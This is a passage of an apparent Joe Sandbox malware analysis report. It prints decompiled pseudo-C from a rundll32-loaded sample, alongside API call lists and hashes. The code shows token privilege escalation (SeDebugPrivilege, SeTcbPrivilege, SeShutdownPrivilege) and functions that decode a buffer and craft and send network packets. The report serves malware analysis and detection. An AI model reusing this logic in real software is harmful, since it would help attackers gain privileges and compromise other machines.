                                                                                                          • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 4260819906-636472023
                                                                                                          • Opcode ID: b4daf84e4ddc8366be43d7f59d05bb584c05460bfbf54ab7abe04ca3558262f6
                                                                                                          • Instruction ID: 7889553d18d8c21e0458aa693c069f27436414c1673d2139bd483896751c42ad
                                                                                                          • Opcode Fuzzy Hash: b4daf84e4ddc8366be43d7f59d05bb584c05460bfbf54ab7abe04ca3558262f6
                                                                                                          • Instruction Fuzzy Hash: F9114F76500249ABEF009FA89C45FAF7FA8EF99315F044445FD009A281D77AD906C764
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A44F43(short __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                          				char _v5;
                                                                                                          				char _v12;
                                                                                                          				void* _v16;
                                                                                                          				signed int _t27;
                                                                                                          				int _t28;
                                                                                                          				void* _t36;
                                                                                                          				void* _t39;
                                                                                                          				signed char _t40;
                                                                                                          				signed int _t41;
                                                                                                          				short _t50;
                                                                                                          
                                                                                                          				_t50 = __eax;
                                                                                                          				_v5 = 0;
                                                                                                          				_t39 = HeapAlloc(GetProcessHeap(), 8, 0x68);
                                                                                                          				if(_t39 == 0) {
                                                                                                          					L11:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t40 = 0;
                                                                                                          				do {
                                                                                                          					_t27 = _t40 & 0x000000ff;
                                                                                                          					_t2 = _t27 + 0x4a53730; // 0xfcfffffa
                                                                                                          					_t40 = _t40 + 1;
                                                                                                          					 *(_t39 + _t27) =  !( *_t2);
                                                                                                          				} while (_t40 < 0x68);
                                                                                                          				_t28 = rand();
                                                                                                          				 *(_t39 + 0x18) = _t28;
                                                                                                          				 *((short*)(_t39 + 0x34)) = _t28 + _t50;
                                                                                                          				if(E04A42F5A(_a4, _a8, _t50, 0, 0xff, 8, _t39, 0x68) != 0) {
                                                                                                          					_v12 = 0;
                                                                                                          					_v16 = 0;
                                                                                                          					if(E04A43071(_t40, _a4, _a8, _t50,  &_v16,  &_v12) != 0) {
                                                                                                          						_t36 = _v16;
                                                                                                          						if(_v12 == 0x70 &&  *((intOrPtr*)(_t36 + 0x50)) == 0x18 &&  *((intOrPtr*)(_t36 + 0x6c)) == 0) {
                                                                                                          							_t41 = 5;
                                                                                                          							_t36 = memcpy( *_a12, _t36 + 0x58, _t41 << 2);
                                                                                                          							_v5 = 1;
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _t36);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                          				goto L11;
                                                                                                          			}













                                                                                                          0x04a44f50
                                                                                                          0x04a44f52
                                                                                                          0x04a44f63
                                                                                                          0x04a44f69
                                                                                                          0x04a45014
                                                                                                          0x04a4501b
                                                                                                          0x04a4501b
                                                                                                          0x04a44f6f
                                                                                                          0x04a44f71
                                                                                                          0x04a44f71
                                                                                                          0x04a44f74
                                                                                                          0x04a44f7a
                                                                                                          0x04a44f7e
                                                                                                          0x04a44f81
                                                                                                          0x04a44f86
                                                                                                          0x04a44f9b
                                                                                                          0x04a44fa4
                                                                                                          0x04a44faf
                                                                                                          0x04a44fbd
                                                                                                          0x04a44fc3
                                                                                                          0x04a44fcd
                                                                                                          0x04a44fd3
                                                                                                          0x04a44fd6
                                                                                                          0x04a44fed
                                                                                                          0x04a44fee
                                                                                                          0x04a44ff0
                                                                                                          0x04a44ff0
                                                                                                          0x04a44ffe
                                                                                                          0x04a44ffe
                                                                                                          0x04a44fcd
                                                                                                          0x04a4500e
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000068,74714F20,?,77D44620,?,04A451F9,?,?,?), ref: 04A44F56
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A451F9,?,?,?), ref: 04A44F5D
                                                                                                          • rand.MSVCRT ref: 04A44F86
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,04A451F9,?,00000000,?,04A451F9,04A451F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04A44FF7
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44FFE
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,04A451F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04A451F9,?,?,?), ref: 04A45007
                                                                                                          • HeapFree.KERNEL32(00000000,?,04A451F9,?,?,?), ref: 04A4500E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$Allocrand
                                                                                                          • String ID: Oqt Uqt0Xqt$p
                                                                                                          • API String ID: 2875874559-1442635772
                                                                                                          • Opcode ID: c90059525ad34cf9efbb4027ea6ba23ed4ec094e8edc25479510e4b16275f361
                                                                                                          • Instruction ID: d4e2a64bb42654c3a467f7952353bf4b0524401b5e4fe0fa299d837fba97a6fc
                                                                                                          • Opcode Fuzzy Hash: c90059525ad34cf9efbb4027ea6ba23ed4ec094e8edc25479510e4b16275f361
                                                                                                          • Instruction Fuzzy Hash: 2021E239900244BFEF119FA49C88FAE7F79EFD5701F008085FA409B181C776984ACBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A469AE(void* _a4, void* _a8, intOrPtr _a12) {
                                                                                                          				signed int _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				intOrPtr* _t31;
                                                                                                          				void* _t36;
                                                                                                          				intOrPtr* _t38;
                                                                                                          				intOrPtr* _t43;
                                                                                                          				void* _t48;
                                                                                                          				intOrPtr* _t51;
                                                                                                          				long _t57;
                                                                                                          				intOrPtr _t61;
                                                                                                          				void* _t63;
                                                                                                          				intOrPtr _t64;
                                                                                                          				void* _t65;
                                                                                                          				intOrPtr _t66;
                                                                                                          				intOrPtr _t67;
                                                                                                          				void* _t68;
                                                                                                          				intOrPtr _t69;
                                                                                                          				void* _t70;
                                                                                                          
                                                                                                          				_t31 = _a4;
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				_t61 =  *0x4a57b80;
                                                                                                          				_t63 = _t31 + 2;
                                                                                                          				do {
                                                                                                          					_t67 =  *_t31;
                                                                                                          					_t31 = _t31 + 2;
                                                                                                          				} while (_t67 != 0);
                                                                                                          				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
                                                                                                          				_v16 = _t36;
                                                                                                          				if(_t36 != 0) {
                                                                                                          					_t38 = _a4;
                                                                                                          					_t68 = _t38 + 2;
                                                                                                          					do {
                                                                                                          						_t64 =  *_t38;
                                                                                                          						_t38 = _t38 + 2;
                                                                                                          					} while (_t64 != 0);
                                                                                                          					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
                                                                                                          					_t43 = _a8;
                                                                                                          					_t65 = _t43 + 2;
                                                                                                          					do {
                                                                                                          						_t69 =  *_t43;
                                                                                                          						_t43 = _t43 + 2;
                                                                                                          					} while (_t69 != 0);
                                                                                                          					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
                                                                                                          					_v12 = _t48;
                                                                                                          					if(_t48 == 0) {
                                                                                                          						L12:
                                                                                                          						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                          					} else {
                                                                                                          						_t51 = _a8;
                                                                                                          						_t70 = _t51 + 2;
                                                                                                          						do {
                                                                                                          							_t66 =  *_t51;
                                                                                                          							_t51 = _t51 + 2;
                                                                                                          						} while (_t66 != 0);
                                                                                                          						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
                                                                                                          						_t57 = E04A46E66(_t66, _t61,  &_v16, _a12);
                                                                                                          						_v8 = _t57;
                                                                                                          						if(_t57 == 0) {
                                                                                                          							HeapFree(GetProcessHeap(), _t57, _v12);
                                                                                                          							goto L12;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}






















                                                                                                          0x04a469b4
                                                                                                          0x04a469b7
                                                                                                          0x04a469bc
                                                                                                          0x04a469c4
                                                                                                          0x04a469c7
                                                                                                          0x04a469c7
                                                                                                          0x04a469ca
                                                                                                          0x04a469cd
                                                                                                          0x04a469ec
                                                                                                          0x04a469ee
                                                                                                          0x04a469f3
                                                                                                          0x04a469f9
                                                                                                          0x04a469fc
                                                                                                          0x04a469ff
                                                                                                          0x04a469ff
                                                                                                          0x04a46a02
                                                                                                          0x04a46a05
                                                                                                          0x04a46a19
                                                                                                          0x04a46a1e
                                                                                                          0x04a46a24
                                                                                                          0x04a46a27
                                                                                                          0x04a46a27
                                                                                                          0x04a46a2a
                                                                                                          0x04a46a2d
                                                                                                          0x04a46a40
                                                                                                          0x04a46a48
                                                                                                          0x04a46a4d
                                                                                                          0x04a46a94
                                                                                                          0x04a46a9c
                                                                                                          0x04a46a4f
                                                                                                          0x04a46a4f
                                                                                                          0x04a46a52
                                                                                                          0x04a46a55
                                                                                                          0x04a46a55
                                                                                                          0x04a46a58
                                                                                                          0x04a46a5b
                                                                                                          0x04a46a6f
                                                                                                          0x04a46a7f
                                                                                                          0x04a46a84
                                                                                                          0x04a46a89
                                                                                                          0x04a46a92
                                                                                                          0x00000000
                                                                                                          0x04a46a92
                                                                                                          0x04a46a89
                                                                                                          0x04a46a4d
                                                                                                          0x04a46aa5

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,74DF84F0,00000000,00000000), ref: 04A469E3
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A469EC
                                                                                                          • memcpy.MSVCRT ref: 04A46A19
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 04A46A3D
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A46A40
                                                                                                          • memcpy.MSVCRT ref: 04A46A6F
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04A46A8F
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A46A92
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A46A99
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A46A9C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFreememcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3405790324-0
                                                                                                          • Opcode ID: 78b338abb555d1c8e3ce692587453e262d3c3ad3dad4859c11373f48cb4f491e
                                                                                                          • Instruction ID: dad6a5ac270b5caee3edb55a69443a4aa85a6e497ba3def8f0d4e4e785e91c86
                                                                                                          • Opcode Fuzzy Hash: 78b338abb555d1c8e3ce692587453e262d3c3ad3dad4859c11373f48cb4f491e
                                                                                                          • Instruction Fuzzy Hash: 49318F7690010AAFDB10AFA8CD45EAF7BB8EFD8344F058461E904CB251E674E714CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A468B5(void* _a4, void* _a8) {
                                                                                                          				signed int _v8;
                                                                                                          				intOrPtr _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* __ebx;
                                                                                                          				intOrPtr* _t33;
                                                                                                          				void* _t38;
                                                                                                          				intOrPtr* _t40;
                                                                                                          				intOrPtr* _t45;
                                                                                                          				void* _t50;
                                                                                                          				intOrPtr* _t53;
                                                                                                          				void* _t67;
                                                                                                          				intOrPtr _t68;
                                                                                                          				void* _t69;
                                                                                                          				intOrPtr _t70;
                                                                                                          				intOrPtr _t71;
                                                                                                          				void* _t72;
                                                                                                          				intOrPtr _t73;
                                                                                                          				void* _t74;
                                                                                                          
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				_v12 =  *0x4a57b80;
                                                                                                          				_t33 = _a4;
                                                                                                          				_t67 = _t33 + 2;
                                                                                                          				do {
                                                                                                          					_t71 =  *_t33;
                                                                                                          					_t33 = _t33 + 2;
                                                                                                          				} while (_t71 != 0);
                                                                                                          				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
                                                                                                          				_v20 = _t38;
                                                                                                          				if(_t38 != 0) {
                                                                                                          					_t40 = _a4;
                                                                                                          					_t72 = _t40 + 2;
                                                                                                          					do {
                                                                                                          						_t68 =  *_t40;
                                                                                                          						_t40 = _t40 + 2;
                                                                                                          					} while (_t68 != 0);
                                                                                                          					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
                                                                                                          					_t45 = _a8;
                                                                                                          					_t69 = _t45 + 2;
                                                                                                          					do {
                                                                                                          						_t73 =  *_t45;
                                                                                                          						_t45 = _t45 + 2;
                                                                                                          					} while (_t73 != 0);
                                                                                                          					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
                                                                                                          					_v16 = _t50;
                                                                                                          					if(_t50 != 0) {
                                                                                                          						_t53 = _a8;
                                                                                                          						_t74 = _t53 + 2;
                                                                                                          						do {
                                                                                                          							_t70 =  *_t53;
                                                                                                          							_t53 = _t53 + 2;
                                                                                                          						} while (_t70 != 0);
                                                                                                          						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
                                                                                                          						_v8 = E04A46E1B(_v12, 0, _t70,  &_v20);
                                                                                                          						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 0, _v20);
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}






















                                                                                                          0x04a468c0
                                                                                                          0x04a468c4
                                                                                                          0x04a468c7
                                                                                                          0x04a468ca
                                                                                                          0x04a468cd
                                                                                                          0x04a468cd
                                                                                                          0x04a468d0
                                                                                                          0x04a468d3
                                                                                                          0x04a468f4
                                                                                                          0x04a468f6
                                                                                                          0x04a468fb
                                                                                                          0x04a46901
                                                                                                          0x04a46904
                                                                                                          0x04a46907
                                                                                                          0x04a46907
                                                                                                          0x04a4690a
                                                                                                          0x04a4690d
                                                                                                          0x04a46921
                                                                                                          0x04a46926
                                                                                                          0x04a4692c
                                                                                                          0x04a4692f
                                                                                                          0x04a4692f
                                                                                                          0x04a46932
                                                                                                          0x04a46935
                                                                                                          0x04a46949
                                                                                                          0x04a46951
                                                                                                          0x04a46956
                                                                                                          0x04a46958
                                                                                                          0x04a4695b
                                                                                                          0x04a4695e
                                                                                                          0x04a4695e
                                                                                                          0x04a46961
                                                                                                          0x04a46964
                                                                                                          0x04a46978
                                                                                                          0x04a46991
                                                                                                          0x04a46998
                                                                                                          0x04a46998
                                                                                                          0x04a469a2
                                                                                                          0x04a469a4
                                                                                                          0x04a469ab

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,775EC0B0,00000000), ref: 04A468EB
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A468F4
                                                                                                          • memcpy.MSVCRT ref: 04A46921
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,74714D40), ref: 04A46946
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A46949
                                                                                                          • memcpy.MSVCRT ref: 04A46978
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04A46995
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A46998
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A4699F
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A469A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFreememcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3405790324-0
                                                                                                          • Opcode ID: 268959f6a84390e9a41852b1d19f573587a5e06fd60605f0bb9c69f411996b90
                                                                                                          • Instruction ID: 80158c50105f7875d38aff8965091ea33b6c963a952fc7a4ea5b7643102c2469
                                                                                                          • Opcode Fuzzy Hash: 268959f6a84390e9a41852b1d19f573587a5e06fd60605f0bb9c69f411996b90
                                                                                                          • Instruction Fuzzy Hash: 2D317C7690010AAFDB10EFA8CD45EAFBBB8EFC8344F058455E904CB251E775EA04CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 93%
                                                                                                          			E04A47897(void* __ecx, void* __esi) {
                                                                                                          				char _v8;
                                                                                                          				long _t3;
                                                                                                          				void* _t15;
                                                                                                          				signed int _t18;
                                                                                                          
                                                                                                          				if( *0x4a57b8c == 0) {
                                                                                                          					srand(GetTickCount());
                                                                                                          					_pop(_t15);
                                                                                                          					 *0x4a57b90 = GetTickCount();
                                                                                                          					_t18 = 0;
                                                                                                          					if(E04A47CC5(L"SeShutdownPrivilege") != 0) {
                                                                                                          						_t18 = 1;
                                                                                                          					}
                                                                                                          					if(E04A47CC5(L"SeDebugPrivilege") != 0) {
                                                                                                          						_t18 = _t18 | 0x00000002;
                                                                                                          					}
                                                                                                          					if(E04A47CC5(L"SeTcbPrivilege") != 0) {
                                                                                                          						_t18 = _t18 | 0x00000004;
                                                                                                          					}
                                                                                                          					 *0x4a57bc0 = _t18;
                                                                                                          					 *0x4a57b7c = E04A4855F();
                                                                                                          					E04A4554A(_t15,  &_v8, 4);
                                                                                                          					 *0x4a57bbc = _v8;
                                                                                                          					_t3 = GetModuleFileNameW( *0x4a57b98, 0x4a57bc8, 0x30c);
                                                                                                          					if(_t3 != 0) {
                                                                                                          						return E04A48832();
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t3;
                                                                                                          			}







                                                                                                          0x04a478a2
                                                                                                          0x04a478b2
                                                                                                          0x04a478b8
                                                                                                          0x04a478c0
                                                                                                          0x04a478c5
                                                                                                          0x04a478ce
                                                                                                          0x04a478d0
                                                                                                          0x04a478d0
                                                                                                          0x04a478dd
                                                                                                          0x04a478df
                                                                                                          0x04a478df
                                                                                                          0x04a478ee
                                                                                                          0x04a478f0
                                                                                                          0x04a478f0
                                                                                                          0x04a478f3
                                                                                                          0x04a478fe
                                                                                                          0x04a47909
                                                                                                          0x04a47921
                                                                                                          0x04a47926
                                                                                                          0x04a4792f
                                                                                                          0x00000000
                                                                                                          0x04a47931
                                                                                                          0x04a4792f
                                                                                                          0x04a47937

                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 04A478AF
                                                                                                          • srand.MSVCRT ref: 04A478B2
                                                                                                          • GetTickCount.KERNEL32 ref: 04A478B9
                                                                                                            • Part of subcall function 04A47CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04A479E8), ref: 04A47CE9
                                                                                                            • Part of subcall function 04A47CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04A479E8), ref: 04A47CF0
                                                                                                            • Part of subcall function 04A47CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04A47D02
                                                                                                            • Part of subcall function 04A47CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04A47D25
                                                                                                            • Part of subcall function 04A47CC5: GetLastError.KERNEL32(?,00000000), ref: 04A47D2D
                                                                                                            • Part of subcall function 04A47CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,04A479E8), ref: 04A47D3F
                                                                                                          • GetModuleFileNameW.KERNEL32(04A57BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A47926
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                                                          • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                                                          • API String ID: 1536163209-50072501
                                                                                                          • Opcode ID: 7dd43a429bdaae220c7fe367dc0473d36b0ce95bb785b613fa836d17eb7dc058
                                                                                                          • Instruction ID: 0add0d61b6ace33ea4c5c1747b1a6ad8da1d9268c46fc34ddf32c3cf702e53cc
                                                                                                          • Opcode Fuzzy Hash: 7dd43a429bdaae220c7fe367dc0473d36b0ce95bb785b613fa836d17eb7dc058
                                                                                                          • Instruction Fuzzy Hash: 9C015E7CE01350ABE710BBB5AB05A1E3A9DEBE46A4F010055E802A2140DB78EC02CE91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E04A450A2(void* __ecx, intOrPtr _a4, void* _a8, short _a12, signed int _a16) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				void* _t25;
                                                                                                          				short _t27;
                                                                                                          				short _t28;
                                                                                                          				void* _t39;
                                                                                                          				signed int _t44;
                                                                                                          				long _t47;
                                                                                                          
                                                                                                          				_push(__ecx);
                                                                                                          				_push(__ecx);
                                                                                                          				_push(0x34);
                                                                                                          				_t47 = 8;
                                                                                                          				_v5 = 0;
                                                                                                          				_t25 = HeapAlloc(GetProcessHeap(), _t47, ??);
                                                                                                          				_t39 = _t25;
                                                                                                          				if(_t39 == 0) {
                                                                                                          					L7:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				do {
                                                                                                          					 *_t25 =  !( *(0x4a53730 + _t25));
                                                                                                          					_t25 = _t25 + 1;
                                                                                                          					_t47 = _t47 - 1;
                                                                                                          				} while (_t47 != 0);
                                                                                                          				_t27 = 0x34;
                                                                                                          				 *((short*)(_t39 + 8)) = _t27;
                                                                                                          				_t28 = 0x13;
                                                                                                          				_t44 = 5;
                                                                                                          				 *((intOrPtr*)(_t39 + 0xc)) = 3;
                                                                                                          				 *((short*)(_t39 + 0x16)) = _t28;
                                                                                                          				_t10 = _t39 + 0x18; // 0x18
                                                                                                          				memcpy(_t10, _a16, _t44 << 2);
                                                                                                          				if(E04A42F5A(_a4, _a8, _a12, 0, 0xff, 8, _t39, 0x34) != 0) {
                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                          					_a16 = _a16 & 0x00000000;
                                                                                                          					if(E04A43071(0, _a4, _a8, _a12,  &_a16,  &_v12) != 0) {
                                                                                                          						HeapFree(GetProcessHeap(), 8, _a16);
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                          				goto L7;
                                                                                                          			}











                                                                                                          0x04a450a5
                                                                                                          0x04a450a6
                                                                                                          0x04a450a9
                                                                                                          0x04a450ad
                                                                                                          0x04a450af
                                                                                                          0x04a450ba
                                                                                                          0x04a450c0
                                                                                                          0x04a450c4
                                                                                                          0x04a45162
                                                                                                          0x04a45168
                                                                                                          0x04a45168
                                                                                                          0x04a450d2
                                                                                                          0x04a450d7
                                                                                                          0x04a450d9
                                                                                                          0x04a450da
                                                                                                          0x04a450da
                                                                                                          0x04a450df
                                                                                                          0x04a450e5
                                                                                                          0x04a450e9
                                                                                                          0x04a450ec
                                                                                                          0x04a450fc
                                                                                                          0x04a45106
                                                                                                          0x04a4510d
                                                                                                          0x04a45110
                                                                                                          0x04a4511f
                                                                                                          0x04a45121
                                                                                                          0x04a45125
                                                                                                          0x04a45141
                                                                                                          0x04a4514f
                                                                                                          0x04a45151
                                                                                                          0x04a45151
                                                                                                          0x04a45141
                                                                                                          0x04a4515f
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000034,74714F20,00000000,?,?,?,04A452FD,?,?,?,?,?,?,?,00000000), ref: 04A450B3
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A452FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04A450BA
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,761F4DB0), ref: 04A45148
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A452FD,?,?,?,?,?,?,?,00000000,00000000), ref: 04A4514F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,761F4DB0,?,?,?,04A452FD,?), ref: 04A45158
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A452FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04A4515F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Free$Alloc
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 3689955550-636472023
                                                                                                          • Opcode ID: 83aa6d568e3c5697f110b4e7985d652bfbf63e7ce60475017d612c1b65944ad2
                                                                                                          • Instruction ID: 5d32b7ef15a44198e9c87c080c35669fe11bab990130a6051317f5238c5ec60b
                                                                                                          • Opcode Fuzzy Hash: 83aa6d568e3c5697f110b4e7985d652bfbf63e7ce60475017d612c1b65944ad2
                                                                                                          • Instruction Fuzzy Hash: 5521CC76A40249BBFF128F94DC48FAE3B6CEFD4315F048445FE04AE180C6B5A919CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 93%
                                                                                                          			E04A4317C(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short _a12) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _t19;
                                                                                                          				signed int _t22;
                                                                                                          				int _t24;
                                                                                                          				signed int _t33;
                                                                                                          				void* _t38;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x200);
                                                                                                          				_v12 = _t19;
                                                                                                          				if(_t19 != 0) {
                                                                                                          					_t37 =  *_a8;
